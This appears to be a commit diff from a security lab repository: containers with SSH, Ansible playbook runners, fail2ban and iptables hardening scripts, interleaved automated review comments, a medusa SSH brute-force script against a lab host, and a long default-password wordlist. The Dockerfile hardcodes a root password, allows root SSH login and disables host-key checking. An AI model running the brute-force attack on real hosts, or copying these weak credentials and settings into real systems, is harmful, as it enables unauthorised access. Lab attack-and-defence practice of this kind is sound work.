commit 7c50890c4ef87408f6fd24e51ba8314a4608d0f0 Author: Zoiros13 Date: Sat Jan 23 11:11:29 2021 +0200 Commit message
diff --git a/.vimrc b/.vimrc
new file mode 100755
index 0000000..7a2858b
--- /dev/null
+++ b/.vimrc
@@ -0,0 +1,15 @@
+map :NERDTreeToggle
+
+autocmd BufNewFile,BufRead *.vue,*.js set syntax=verilog tabstop=2|set shiftwidth=2|set noexpandtab autoindent
+augroup remember_folds
+ autocmd!
+ autocmd BufWinLeave * mkview
+ autocmd BufWinEnter * silent! loadview
+augroup END
+" Useful for my Quick Notes feature in my tmuxrc
+augroup QuickNotes
+ au BufWrite,VimLeave NOTES.otl mkview
+ au BufRead NOTES.otl silent loadview
+augroup END
+set swapfile
+set dir=~/tmp
diff --git a/Dockerfile b/Dockerfile
new file mode 100755
index 0000000..0c8f579
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,33 @@
+FROM localhost:5000/sec
+#
+USER root
+RUN export DEBIAN_FRONTEND=noninteractive && apt-get update && apt-get --no-install-recommends install -y openssh-server net-tools curl tcpdump shorewall sudo vim nmap dnsutils iputils-ping iptables wget python
+RUN apt-get autoremove --purge && apt clean
+RUN rm -rf /var/lib/apt/lists/*
+RUN mkdir -p /var/run/sshd
+RUN echo 'root:pass' | chpasswd
+RUN sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
+#
+# SSH login fix. Otherwise user is kicked off after login
+RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd
+#
+ENV NOTVISIBLE "in users profile"
+RUN echo "export VISIBLE=now" >> /etc/profile
+#RUN wget -k https://raw.githubusercontent.com/egalpin/apt-vim/master/install.sh
+#
+#
+#
+COPY sec_bootstrap /usr/bin
+COPY get_hosts /usr/bin
+COPY auto_update_hosts /usr/bin
+RUN mkdir -p /etc/shorewall
+COPY shorewall /etc/shorewall
+RUN mkdir -p /etc/opt
+RUN mkdir -p /project
+WORKDIR /project
+COPY install-vim-plugin.sh .
+#RUN bash ./install-vim-plugin.sh
+#RUN apt-vim install -y https://github.com/scrooloose/nerdtree.git
+RUN grep -qw ^docker /etc/passwd || useradd -m docker && echo "docker:docker" | chpasswd && adduser docker sudo
+COPY .vimrc /home/docker
+USER docker
diff --git a/ROOT_PASSWORD b/ROOT_PASSWORD
new file mode 100755
index 0000000..7f3a2ef
--- /dev/null
+++ b/ROOT_PASSWORD
@@ -0,0 +1 @@
+ROOT_PASSWORD="pass"
diff --git a/auto_update_hosts b/auto_update_hosts
new file mode 100755
index 0000000..53c8abe
--- /dev/null
+++ b/auto_update_hosts
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+hosts=$(get_hosts)
+printf "%s" "$hosts" > "$1"
+
+while sleep 2
+do
+ current_hosts=$(get_hosts)
+ [ "$hosts" != "$current_hosts" ] && printf "%s" "$current_hosts" > "$1"
+ hosts=$current_hosts
+done
diff --git a/backup_files/ansible_cfg_text b/backup_files/ansible_cfg_text
new file mode 100644
index 0000000..c99ba69
--- /dev/null
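Review bot: The root password is fixed at build time by `RUN echo 'root:pass' | chpasswd`, root SSH login is then switched on with `PermitRootLogin yes`, and the last `RUN` gives the sudo-capable `docker` account the password `docker`; the same root password is committed again in the `ROOT_PASSWORD` file added by this commit. Both values are readable in the image history and in the repository, so the lab network is the only thing standing between the container's sshd and a root login. If password login is needed for the exercise, the credential can be supplied at build time instead of being written into a layer, e.g. `RUN --mount=type=secret,id=root_pw chpasswd < /run/secrets/root_pw`, with `ROOT_PASSWORD` kept out of the repository; otherwise keep `PermitRootLogin prohibit-password` and install a public key. `FROM localhost:5000/sec` also carries no tag or digest, so the base this image is built on is whatever that registry currently serves.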
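Review bot: In `auto_update_hosts`, `$1` is used as the output path without being checked, so a call with no argument fails on the first redirect and again each time the host list changes; a guard such as `[ -n "$1" ] || { echo "usage: $0 FILE" >&2; exit 1; }` before the first `printf` would stop that. The `printf ... > "$1"` rewrite truncates the file before writing, so a reader can see an empty or partial list; writing to a temporary file in the same directory and `mv`-ing it over `$1` avoids that. `get_hosts` is not part of this commit, so its failure behaviour is not visible here, but an error that prints nothing would replace the file with an empty list.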
+++ b/backup_files/ansible_cfg_text
@@ -0,0 +1,35 @@
+# config file for ansible -- https://ansible.com/
+# ===============================================
+
+# nearly all parameters can be overridden in ansible-playbook
+# or with command line flags. ansible will read ANSIBLE_CONFIG,
+# ansible.cfg in the current working directory, .ansible.cfg in
+# the home directory or /etc/ansible/ansible.cfg, whichever it
+# finds first
+
+[defaults]
+host_key_checking = False
+
+# some basic default values...
+
+#inventory = /etc/ansible/hosts
+#library = /usr/share/my_modules/
+#module_utils = /usr/share/my_module_utils/
+#remote_tmp = ~/.ansible/tmp
+#local_tmp = ~/.ansible/tmp
+#plugin_filters_cfg = /etc/ansible/plugin_filters.yml
+#forks = 5
+#poll_interval = 15
+#sudo_user = root
+#ask_sudo_pass = True
+#ask_pass = True
+#transport = smart
+#remote_port = 22
+#module_lang = C
+#module_set_locale = False
+
+# plays will gather facts by default, which contain information about
+# the remote system.
+#
+# smart - gather by default, but don't regather if already gathered
+
diff --git a/backup_files/ddos_atck_script.sh b/backup_files/ddos_atck_script.sh
new file mode 100755
index 0000000..9867bae
--- /dev/null
+++ b/backup_files/ddos_atck_script.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass
+
diff --git a/backup_files/fail2ban_script.sh b/backup_files/fail2ban_script.sh
new file mode 100755
index 0000000..3c9b2fc
--- /dev/null
+++ b/backup_files/fail2ban_script.sh
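Review bot: `host_key_checking = False` under `[defaults]` turns off SSH host-key verification for every play that reads this file, and `backup_files/first_script.sh` in the same commit writes the same line into `/etc/ansible/ansible.cfg` with `sed -i "11i host_key_checking = False"`. Both playbook scripts in this commit then run `ansible-playbook` with `--ask-pass --ask-become-pass`, so the login and sudo passwords go to whichever machine answers at the inventory addresses. A narrower option is to leave checking on and pre-populate `known_hosts` when the lab hosts are provisioned, or to scope the override to a single run with the `ANSIBLE_HOST_KEY_CHECKING=False` environment variable instead of editing the system-wide file. If the setting stays, a comment beside it such as `# lab only: host keys are not verified; do not reuse outside the test network` would keep it from being copied elsewhere unnoticed.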
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+
+sudo apt-get update -y # To get the latest package lists
+sudo apt install rsyslog #instal auth.log
+sudo service rsyslog start #start syslog
+#grep "Failed password" /var/log/auth.log #check for login failures
+#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort
+sudo cat /var/log/auth.log | grep "Failed password"
+sudo apt install fail2ban -y
+sudo service fail2ban enable
+sudo service fail2ban start
+sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
+sudo sed -i '244d' /etc/fail2ban/jail.local
+sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local
+sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local
+sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local
+sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local
+sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local
+sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local
+sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local
+sudo service fail2ban restart
+sudo fail2ban-client status sshd
+sudo iptables -L
+
+
+
+
diff --git a/backup_files/first_script.sh b/backup_files/first_script.sh
new file mode 100755
index 0000000..74b329a
--- /dev/null
+++ b/backup_files/first_script.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}'
+
+sudo apt-get update -y # To get the latest package lists
+sudo apt install ansible -y
+sudo apt install sshpass -y
+sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg
+ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass
+#sudo tcpdump -i eth0
+#now interrupt the process. get its PID:
+#pid=$(ps -e | pgrep tcpdump)
+#echo $pid
+#
+#interrupt it:
+#sleep 5
+#kill -2 $pid
+
+
diff --git a/backup_files/hello_world.sh b/backup_files/hello_world.sh
new file mode 100755
index 0000000..b5b6a5a
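Review bot: In `fail2ban_script.sh` the jail is configured by deleting and appending at fixed line numbers (`sed -i '244d'`, then `sed -i '239 a enabled = true'` through line 245) in a copy of `jail.conf`, which only lands in the intended section for the one fail2ban package version whose `jail.conf` has that exact layout; on any other version the settings go into a different jail or corrupt the file, and nothing in the script detects it. The settings look intended for the `sshd` jail, since the script ends with `fail2ban-client status sshd`, so a drop-in file under `/etc/fail2ban/jail.d/` that names the section is sturdier; the values below are the ones in the hunk, with `chain` and `action_` left at the package defaults. Two smaller points: `sudo apt install rsyslog` has no `-y` and will wait for input, and `sudo service fail2ban enable` is unlikely to be an action the init script accepts, so the script should stop on the first failing command (`set -e`) instead of carrying on.

```shell
# … unchanged: apt-get update, rsyslog and fail2ban installation …
sudo tee /etc/fail2ban/jail.d/sshd.local >/dev/null <<'EOF'
[sshd]
enabled  = true
port     = 22
maxretry = 3
findtime = 30
bantime  = 300
EOF
sudo service fail2ban restart
# … unchanged: fail2ban-client status sshd, iptables -L …
```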
--- /dev/null
+++ b/backup_files/hello_world.sh
@@ -0,0 +1 @@
+echo "Hello World"
diff --git a/backup_files/inventory.yml b/backup_files/inventory.yml
new file mode 100644
index 0000000..6aabedc
--- /dev/null
+++ b/backup_files/inventory.yml
@@ -0,0 +1,6 @@
+[service]
+172.21.0.2
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6
diff --git a/backup_files/inventory_w.yml b/backup_files/inventory_w.yml
new file mode 100644
index 0000000..efd3e61
--- /dev/null
+++ b/backup_files/inventory_w.yml
@@ -0,0 +1,5 @@
+[service]
+172.21.0.3
+172.21.0.4
+172.21.0.5
+172.21.0.6
diff --git a/backup_files/iptables_rules.sh b/backup_files/iptables_rules.sh
new file mode 100755
index 0000000..f8f688c
--- /dev/null
+++ b/backup_files/iptables_rules.sh
@@ -0,0 +1,54 @@
+#!/bin/sh
+
+### 1: Drop invalid packets
+#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
+
+### 2: Drop TCP packets that are new and are not SYN ###
+#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
+
+### 3: Drop SYN packets with suspicious MSS value ###
+#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
+
+### 4: Block packets with bogus TCP flags ###
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
+#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
+
+### 5: Block spoofed packets ###
+#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
+#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
+#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
+#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
+#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
+#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
+
+### 7: Drop fragments in all chains ###
+#iptables -t mangle -A PREROUTING -f -j DROP
+
+### 8: Limit connections per source IP ###
+iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
+
+### 9: Limit RST packets ###
+iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
+iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
+
+
+### 10: Limit new TCP connections per second per source IP ###
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
+iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
+
+### 11:SYNPROXY
+#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
+#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
+#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
+
+### SSH brute-force protection ###
+#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP
+
diff --git a/backup_files/medusa_script.sh b/backup_files/medusa_script.sh
new file mode 100755
index 0000000..4dceab8
--- /dev/null
+++ b/backup_files/medusa_script.sh
@@ -0,0 +1,10 @@
+#!/bin/sh
+
+
+sudo apt-get update -y # To get the latest package lists
+sudo apt install medusa -y
+cp /project/passwd_list.txt .
+medusa -h 172.21.0.4 -u docker -P ./passwd_list.txt -M ssh -f -v 6
+
+
+
diff --git a/backup_files/passwd_list.txt b/backup_files/passwd_list.txt
new file mode 100644
index 0000000..a62570b
--- /dev/null
+++ b/backup_files/passwd_list.txt
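Review bot: In `iptables_rules.sh`, rule 10 is labelled "per source IP", but `-m limit --limit 60/s --limit-burst 20` is a single bucket shared by all sources, so one noisy client can use up the allowance and the following `--ctstate NEW -j DROP` then drops every other client's new connections. A per-source limit needs the hashlimit match, e.g. `iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m hashlimit --hashlimit-name newconn --hashlimit-mode srcip --hashlimit-upto 60/sec --hashlimit-burst 20 -j ACCEPT`; the RST limit in rule 9 has the same shape if it is also meant per source. In the commented SSH section the two rules are fused on one line (`--set#iptables -A INPUT ...`), so uncommenting it as written would fail rather than add two rules. The script also appends with `-A` on every run, so running it twice duplicates the active rules; a header comment saying it expects an empty INPUT chain would make that explicit.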
@@ -0,0 +1,5276 @@ +d[^_^] +* +0 +00 +000 +0000 +00000 +000000 +0000000 +00000000 +06071992 +09090 +0P3N +docker +0RACLE +0RACLE38 +0RACLE39 +0RACLE8 +0RACLE8I +0RACLE9 +0th +1 +1000 +100198 +10023 +1064 +11 +111 +1111 +11111 +111111 +1111111 +11111111 +11223344 +12 +123 +123123 +1234 +12341 +12341234 +12345 +123454 +123456 +1234567 +12345678 +1234567890 +1234admin +123qwe +127.0.0.1 +12871 +1322222 +14admin +1502 +166816 +18140815 +19750407 +1988 +19920706 +1RRWTTOOI +2 +21241036 +2222 +22222 +22222222 +22332323 +234 +23646 +240653C9467E45 +24343 +24Banc81 +2501 +256256 +2580 +266344 +2800 +29111991 +2WSXcde +2WSXcder +3 +3098z +31994 +3333 +33333333 +3477 +3ascotel +3com +3Com +3comcso +3ep5w2u +*3noguru +3ware +4 +40793 +4133 +4321 +4444 +44444 +44444444 +456 +4Dgifts +4getme2 +4tas +4tugboat +5 +5555 +55555555 +5678 +56789 +5777364 +57gbzb +589589 +5897 +589721 +5X2000 +6 +60020 +6071992 +657 +6666 +666666 +66666666 +7 +7061992 +727 +744 +75780432 +7654321 +7772000 +7777 +77777777 +7936 +8 +8111 +8429 +8888 +88888888 +8RttoTriz +9 +9999 +99999999 +a +A52896nG93096a +aa +aaa +AaBbCcDd +aammii +abc123 +ABCD +abd234 +acc +access +Access +ACCESS +ACCORD +accounting +acer +adaptec +adb234 +adfexc +ADLDEMO +adm +admin +!admin +Admin +ADMIN +admin00 +admin000 +admin1 +admin_1 +Admin1 +admin123 +admin1234 +admin2 +ADMIN (23646) +admin256 +Admin5 +adminadmin +Administrative +administrator +Administrator +ADMINISTRATOR +adminpass +adminpwd +adminstat +adminstrator +adminttd +adminuser +adminview +admn +ADMN +admpw +ADSL +adsl1234 +adslolitec +adslroot +adtran +ADTRAN +Advance +advcomm500349 +ADVMAIL +ahetzip8 +Airaya +AIROPLANE +AitbISP4eCiG +alfarome +alien +ALLIN1 +ALLIN1MAIL +ALLINONE +allot +aLLy +Alphanetworks +AlpheusDigital1010 +alpine +AM +amber +ami +AMI +A.M.I +AMI~ +AMIAMI +AMIDECOD +amigosw1 +AMI.KEY +AMI.KEZ +amipswd +AMIPSWD +AMISETUP +AMI_SW +AMI!SW +AMI?SW +anicust +anon +anonymous +Anonymous +ANS#150 +any +any@ +Any +ANYCOM +AP +aPAf +aparker +apc +APC 
+application +APPLSYS +APPS +APPS_MRC +APPUSER +AQ +AQDEMO +AQJAVA +AQUSER +AR#Admin# +ARCHIVIST +articon +asante +Asante +ascend +Ascend +asd +asd123 +asecret +at4400 +atc123 +atc456 +atlantis +attack +AUDIOUSER +author +autocad +AUTORAID +award +?award +award_? +Award +AWARD +award_ps +AWARD_PW +award.sw +AWARD_SW +AWARD?SW +awkward +ax400 +axis2 +b +babbit +Babylon +backdoor +BACKUP +backuponly1 +backuprestore1 +BackupU$r +badg3r5 +bagabu +barney +barricade +Barricade +BASE +basisk +BATCH +bbs +BC4J +bciim +bciimpw +bcim +bcimpw +bcms +bcmspw +bcnas +bcnaspw +bell9 +bewan +BIGO +bill +bin +bintec +biodata +bios +BIOS +BIOSPASS +biosstar +biostar +Biostar +blablabla +blender +blue +bluepw +boca +boss +bpel +BRIDGE +brightmail +BRIO_ADMIN +broadband +brocade1 +browse +browsepw +bsxpass +builtin +c +cablecom +cable-docsis +Cable-docsis +cacadmin +cac_admin +calvin +CAROLIAN +cascade +CATALOG +cc +CCC +cclfb +ccrusr +CDEMO82 +CDEMOCOR +CDEMORID +CDEMOUCB +cellit +CENTRA +central +CENTUM +cgadmin +chain +changeit +changeme +changeme! 
+changeme2 +changeonfirstlogin +change_on_install +CHANGE_ON_INSTALL +changethis +checkfs +checkfsys +checksys +CHEY_ARCHSVR +ChgMeNOW +$chwarzepumpe +CIDS +CIS +cisco +Cisco +_Cisco +cisco123 +CISCO15 +ciscofw +Cisco router +ciscovpn +CISINFO +CISSUS +citel +ciwuxe +CLERK +client +CLOTH +cmaker +CMOSPWD +cms500 +CMSBATCH +CNAS +COGNOS +col1ma +Col2ogro2 +comcast +comcomcom +COMPANY +Compaq +COMPIERE +Compleri +CONCAT +condo +CONDO +conexant +Config +CONFIG (266344) +Congress +connect +console +control +CONV +converge +corecess +correct +cr0wmt 911 +craft +craftpw +Craftr4 +crash +crftpw +Crystal +CSG +CSMIG +CTX_123 +CTXDEMO +CTXSYS +cusadmin +cust +customer +custpw +d +d1scovery +dadmin +dadmin01 +daemon +Daewuu +damin +danger +davox +Daytec +db2admin +db2fenc1 +db2inst1 +dbase +DBDCCIC +dbpass +dbps +DBSNMP +DCL +debug +d.e.b.u.g +DECMAIL +DECNET +default +DEFAULT +default.password +Dell +deltav +demo +DEMO +DEMO8 +DEMO9 +demos +DES +deskalt +deskman +desknorm +deskres +detmond +dev +DEV2000_DEMOS +device +dhs3mt +dhs3pms +diag +diamond +DIGITAL +DIP +DISC +DISCOVERER_ADMIN +distrib0 +disttech +djonet +D-Link +dmr99 +dn_04rjc +dni +dnnadmin +dnnhost +dos +docker +dottie +draadloos +draytek +DSGATEWAY +DSL +@dsl_xilno +DSSYS +D_SYSPW +D_SYSTPW +DTA +ducati900ss +DV5800 +dvr2580222 +dvst10n +e250 +e250changeme +e500 +e500changeme +eagle +echo +efmukl +EJSADMIN +Ektron +Emerson1 +EMP +enable +eng +engineer +engmode +enhydra +enquiry +enquirypw +enter +eomjbOBLLwbZeiKV +epicrouter +equalizer +ergc +ESSEX +ESTORE +etas +EVENT +Everything +Exabyte +EXFSYS +exinda +expert +expert03 +Expert03 +extendnet +Fact4EMC +factory +Factory +fal +fam +familymacintosh +fax +FAX +FAXUSER +FAXWORKS +fibranne +field +FIELD +FIELD.SUPPORT +Fiery.1 +FINANCE +Fireport +firstsite +fivranne +FND +FNDPUB +FOOBAR +foolproof +FORCE +FORSE +friend +ftp +ftp_admi +ftp_inst +ftp_nmc +ftp_oper +funkwerk +funwerk +fw +g6PJ +games +gandalf +ganteng +Gateway +GATEWAY +Geardog +Gearguy +gen1 +GEN1 
+gen2 +GEN2 +ggdaseuaimhrke +GL +glftpd +GlobalAdmin +gniffe +gnumpf +gopher +GPFD +GPLD +guardone +gubed +guest +Guest +GUEST +guest1 +guestgue +GUESTGUE +GUESTGUEST +guru +gvt12345 +GWrv +h179350 +h6BB +hagpolm1 +halt +HARRIS +hawk201 +HCPARK +hdms +HELGA-S +hello +HELLO +help +HELP +help1954 +helpdesk +Helpdesk +HELPDESK +HEWITT +HEWITT RAND +hewlpack +highspeed +Highspeed +HighSpeed +HLT +HLW +honey +HOST +hp +HP +hp.com +HPDESK +HPLASER +HPOFFICE +HPOFFICE DATA +HPONLY +HPP187 +HPP187 SYS +HPP189 +HPP196 +hpt +HPWORD +HPWORD PUB +hqadmin +HR +hs7mwxkk +hsa +hsadb +hscroot +http +HTTP +hydrasna +ibm +IBM +ibmcel +iclock +iDirect +ILMI +ilom-admin +ilom-operator +ilon +ImageFolio +images +IMAGEUSER +IMEDIA +imsa7.0 +imss7.0 +inads +indspw +INFO +informix +infrant1 +INGRES +init +initpw +install +installer +INSTANCE +intel +Intel +intermec +IntraStack +IntraSwitch +INTX3 +inuvik49 +INVALID +ioFTPD +iolan +IP +ip20 +ip21 +ip3000 +ip305Beheer +ip400 +ironport +iscopy +isdev +isee +IS_$hostname +!ishtar +isolation +isp +ISPMODE +ITF3000 +iwill +j09F +j256 +j262 +j322 +j5Brn9 +j64 +jagadmin +james +jamfsw03 +Janitza +jannie +janta211 +jasperadmin +jboss4 +JDE +jdoe +JETSPEED +JMUSER +joeuser +joh316 +jstwo +juniper123 +kahn +Keep +kermit +KEYSCAN +kilo1987 +kn1TG7psLu +kodi +komprie +kronites +ksdjfg934t +l +l1 +l2 +L2LDEMO +l3 +laflaf +#l@$ak#.lk;0@P +lantronix +LASER +LASERWRITER +last +LBACSYS +LdapPassword_1 +leaves +lesarotl +letacia +letacla +letmein +leviton +Liebert +lineprin +linga +LINK +live +lkw +lkwpeter +lkw peter +LKWPETER +llatsni +Local +locate +locatepw +logapp +login +logon +look +looker +LOTUS +lp +lpadm +lpadmin +LRISDN +LR-ISDN +LUCENT01 +LUCENT02 +lucenttech1 +lucenttech2 +lucy99 +Lund +lynx +m +m1122 +m1link +mac +MagiMFP +mail +MAIL +MAILER +maint +MAINT +maintain +maintaince +maintainer +maintpw +man +MANAG3R +manage +!manage +manager +Manager +MANAGER +managers +MANAGER.SYS +manuf +marketing +master +Master +MASTER +masterkey +Mau?dib 
+Mau'dib +Mau’dib +MBIU0 +MBMANAGER +MBWATCH +mcp +MCUrv +MCUser1 +MD110 +MDaemon +MDDEMO +MDSYS +me +mediator +medion +meinsm +Menara +mercury +merlin +mfd +MFG +MGR +MGR.SYS +MGWUSER +michelangelo +Michelangelo +MICHELANGELO +MICRO +microbusiness +Microbusiness +MIGRATE +MILLER +miniap +miniAP +MiniAP +ml1100 +ml1400 +mlusr +mMmM +MMO2 +mnet +monitor +mono +MOREAU +motorola +mountfs +mountfsys +mountsys +mozart +mp3mystic +MPE +mpegvideo +@mprs643 +MServer +MSHOME +mso +mtch +mtcl +MTRPW +MTS_PASSWORD +MTSSYS +MTYSYS +mu +mU +Mu +MU +Mua'dib +Multi +MUMBLEFRATZ +Muse!Admin +Musi%1921 +Musii%1921 +muze +MuZhlo9n%8!G +MXAGENT +my_DEMARC +mydlp +mysecretpassword0* +mysweex +n/a +naadmin +NAMES +NAU +ncadmin +ncrm +(nessun) +netadmin +NETBASE +netbotz +NetCache +NETCON +NETFRAME +netgear1 +NetICs +netlink +netman +NETMGR +NETNONPRIV +NETOP +netopia +netops +NETOulu +NETPRIV +netrangr +netscreen +NetSeq +NetServer +NETSERVER +NetSurvibox +NetVCR +NETWORK +NEWINGRES +news +NEWS +NeXT +NF +NFI +nicecti +nician +NICONEX +@*nigU^D.ha +nimda +nimdaten +nm2user +nms +nmspw +no +No +nobody +NOC +nokai +nokia +none +NONPRIV +nopasswd +nortel +novell +noway +nsa +nsi +nsroot +ntacdmax +NTCIP +ntpupdate +NULL +nz0u4bbe +OAS_PUBLIC +OCITEST +OCS +ODM +ods +ODS +ODSCOMMON +OE +OEMADM +OEMREP +oem_temp +OEM_TEMP +OkiLAN +OLAPDBA +OO +OOOOOOOO +op +OPENSPIRIT +Oper +OPER +OPERATIONS +OPERATNS +operator +Operator +OPERATOR +OPERVAX +OP.OPERATOR +ORACL3 +oracle +ORACLE +ORACLE8 +ORACLE8I +ORACLE9 +ORAREGSYS +ORASSO +ORDPLUGINS +ORDSYS +orinoco +orion99 +osmc +OSP22 +otbu+1 +OUTLN +overseer +OWA +OWA_PUBLIC +OWNER +p1nacate +P@55w0rd! 
+pamadmin +PANAMA +PAPER +par0t +Partner +pass +PASS +passw0rd +Passw0rd +PASSW0RD +passwd +password +Password +PASSWORD +password1 +passwort +Passw@rd +patrol +PATROL +pa$$word +PBX +pbxk1064 +PCUSER +PDP11 +PDP8 +pento +Pento +pepino +perfectpraise +PERFSTAT +peribit +permit +Pete +PFCUser +pfsense +phplist +phpreactor +pilou +piranha +pixadmin +pixmet2003 +PLEX +PlsChgMe +PlsChgMe! +PM +pmd +pnadmin +PO +PO7 +PO8 +poll +Polrty +Polycom +PORTAL30 +PORTAL30_DEMO +PORTAL30_PUBLIC +PORTAL30_SSO +PORTAL30_SSO_PS +PORTAL30_SSO_PUBLIC +PORTAL31 +POST +Posterie +postmast +POSTMASTER +powerapp +POWERCARTUSER +powerdown +powervault +PRIMARY +prime +primenet +primeos +primos +PRINT +PRINTER +PRIV +private +PRODCICS +PRODDTA +PROG +prost +protection +Protector +prtgadmin +PSEAdmin +PUB +public +Public +public/private/secret +publish +PUBSUB +PUBSUB1 +pw +P@$$W0RD +pwp +pwpw +pwrchute +q +Q +Q54arwms +QDBA +QDI +QNX +qpgmr +QS +QS_ADM +QS_CB +QS_CBADM +QS_CS +qsecofr +QSECOFR +qserv +QS_ES +QS_OS +qsrv +QSRV +qsrvbas +QSRVBAS +qsvr +QS_WS +qsysopr +questra +quser +QUSER +qwerty +R1QTPS +radius +radware +raidzone +rainbow +(random +rapport +raritan +raspberry +RAV +rcust +rcustpw +rdc123 +RE +readonly +ReadOnly +readwrite +ReadWrite +recover +recovery +redips +redline +REGO +REMOTE +REPADMIN +repair +replication-receiver +replicator +REPORT +REP_OWNER +restoreonly1 +resumix +$rfmngr$ +RIP000 +riverhead +rje +RJE +rkwjsdusrnth +RM +RMAIL +RMAN +rmnetlm +RMUser1 +ro +ROBELLE +rodopi +Rodopi +role1 +root +!root +Root +ROOT +ROOT500 +rootadmin +rootme +rootpass +route +router +r@p8p0r+ +RSAAppliance +rsadmin +RSBCMON +RSX +rw +rwa +rwmaint +sa +SABRE +sales +s!a@m#n$p%c +SAMPLE +sanfran +san fran 8 +SAP +sap123 +SAPR3 +sasasa +scmadmin +scmchangeme +scout +SDGROCKS +SDOS_ICSAP +secacm +SECDEMO +secoff +secofr +SECONDARY +secret +SECRET123 +secur4u +secure +$secure$ +security +SECURITY +SENTINEL +SER +serial# +Serial +Serialnumber +Serial Number +sertafu +Serv4EMC +service 
+Service +SERVICE +SERVICECONSUMER1 +SESAME +setup +setup/nopasswd +SH +Sharp +SHELVES +shiva +shs +shutdown +signa +singh +siteadmin +sitecom +Sitecom +SITEMINDER +SKY_FOX +sl33p30F00dumass! +sldkj754 +SLIDEPW +sma +smallbusiness +smc +smcadmin +Smcadmin +SMDR +smile +snake +snmp +snmp-Trap +SNOWMAN +SnuFG5 +software +software01 +sp99dd +Spacve +spcl +specialist +speedxess +SpIp +SPOOLMAN +spooml +SQL +$SRV +SSA +ssadmin +ssladmin +ssp +star +STARTER +STEEL +storageserver +store +storwatch +stratacom +stratauser +STRAT_PASSWD +STUDENT +su +sudo +Sudo +sun123 +super +Super +SUPER +superadmin +superman +superpass +SUPERSECRET +superuser +SUPERUSER +supervisor +SUPERVISOR +support +Support +SUPPORT +supportpw +su@psir +surecom +surt +svcPASS83 +SW_AWARD +switch +SWITCH +SWITCHES_SW +swordfish +SWORDFISH +SWPRO +SWUSER +sx2000 +Sxyz +symantec +SY_MB +symbol +Symbol +SYMPA +sync +synnet +sys +SYS +SYS1 +SYSA +sysadm +SYSADM +sysadmin +sysAdmin +Sysadmin +sysadmpw +sysbin +sys/change_on_install +SYSDBA +syslib +SYSLIB +SYSMAINT +SYSMAN +Sysop +sysopr +SYSPASS +syspw +system +System +SYSTEM +system_admin +SYSTEST +SYSTEST_CLIG +SZYX +t00lk1t +t0ch20x +t0ch88 +t0talc0ntr0l4! 
